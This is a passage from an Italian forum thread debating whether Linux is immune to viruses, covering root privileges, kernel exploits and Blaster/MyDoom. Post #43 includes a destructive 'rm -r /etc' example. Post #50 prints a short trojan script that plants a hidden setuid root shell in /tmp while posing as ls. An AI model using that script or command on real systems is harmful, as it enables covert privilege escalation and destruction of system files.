|
|
|
![]() |
|
Strumenti |
![]() |
#41 |
Bannato
Iscritto dal: Jul 2000
Città: Malo (VI)
|
Mi sto semplicemente dilettando con lo
"UNIX-Haters handbook" ![]() comunque non ci si scappa... con l'ultimo alias ti precludi tutte le possibili opzioni ![]() |
![]() |
![]() |
![]() |
#42 | |
Senior Member
Iscritto dal: Nov 2000
|
Quote:
![]() come dice Marco è un problema filosofico .... ![]() Ciao
![]() |
![]() |
#43 | |
Senior Member
Iscritto dal: May 2002
Città: Padua, Italy
|
Re: Perchè su Linux "non ci sono virus"
Quote:
ipotizziamo un virus... Codice:
$ rm -r /etc ... .... Enter the password for "root": ![]() |
|
![]() |
![]() |
![]() |
#44 |
Senior Member
Iscritto dal: May 2002
Città: Padua, Italy
|
era già stato detto...
![]() |
![]() |
![]() |
![]() |
#45 |
Senior Member
Iscritto dal: Mar 2002
Città: Padova
|
tenete a mente un particolare... un qualunque virus cercherà di guadagnare i privilegi di root perchè chi lo scrive sa benissimo che senza non combinerà molto. Per fare questo utilizzerà un exploit che in qualche modo lo rende root. Il bello è che un exploit che funziona da me può tranquillamente non funzionare da te e viceversa... oppure come nel caso del baco trovato nel 2.4.23 che ha portato all'uscita prematura del 2.4.24: da me magari funziona, da te no... mettiamo poi che il kernel sia patchato (tipo mandrake e redhat) non funzionerà nemmeno li.... insomma la diversificazione che c'è su linux rende cmq un virus "poco" offensivo xchè, se non viene eseguito da root, si troverà di fronte situazioni da esaminare caso per caso e quindi le probabilità di successo diventeranno scarse.
In definitiva: di virus per linux ce ne sono, e si può ipotizzare che in futuro sempre più gente si metterà a scriverne. Ma seguendo il ragionamento sopra si può prevedere che questi virus possano colpire sempre un numero non esagerato di computer. non saremo mai di fronte ad una situazione come il blaster di questa estate insomma. La questione mydoom invece è tutta un'altra cosa. la si vede solo quanto sia facile ingannare la gente.
Things should be as simple as possible, but not simpler. (Albert Einstein) Mi hanno sempre fatto credere che nell'incertezza è meglio prendere: ma se io prendo, chi è che dà? (Negrita, Bambole) Dapprima ti ignorano, poi ti ridono dietro. Poi cominciano a combatterti. Poi tu vinci. (Mahatma Gandhi) |
![]() |
![]() |
![]() |
#46 |
Senior Member
Iscritto dal: Aug 2003
Città: Raleigh (North Carolina)
|
io in /varie/ms_vrz
ho una copia funzionante del blast, del doom e altre cazzatelle varie... ![]()
![]() |
#47 | |
Senior Member
Iscritto dal: Apr 2003
Città: Genova
|
Quote:
![]() ![]()
Jappilas is a character created by a friend for his own comic - I feel honored he allowed me to bear his name Saber's true name belongs to myth - a Heroic Soul out of legends, fighting in our time to fullfill her only wish Let her image remind of her story, and of the emotions that flew from my heart when i assisted to her Fate
|
|
![]() |
![]() |
![]() |
#48 | |
Senior Member
Iscritto dal: Jun 2003
Città: Genova
|
Quote:
![]() se vuoi ti faccio una copia ![]() |
|
![]() |
![]() |
![]() |
#49 | |
Senior Member
Iscritto dal: Aug 2003
Città: Raleigh (North Carolina)
|
Quote:
![]() non è che voglio fare uno zoo, è che mi arrivano via mail, e io come un bambino clikko sul file ma non succede nulla... ![]()
![]() |
![]() |
#50 | |
Bannato
Iscritto dal: Jul 2000
Città: Malo (VI)
|
Re: Re: Perchè su Linux "non ci sono virus"
Quote:
Codice:
#!/bin/sh cp /bin/sh /tmp/.shl chmod 4755 /tmp/.shl exec /bin/ls \$1 \$2 \$3 \$ ![]() ![]() |
|
![]() |
![]() |
![]() |
Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 07:23.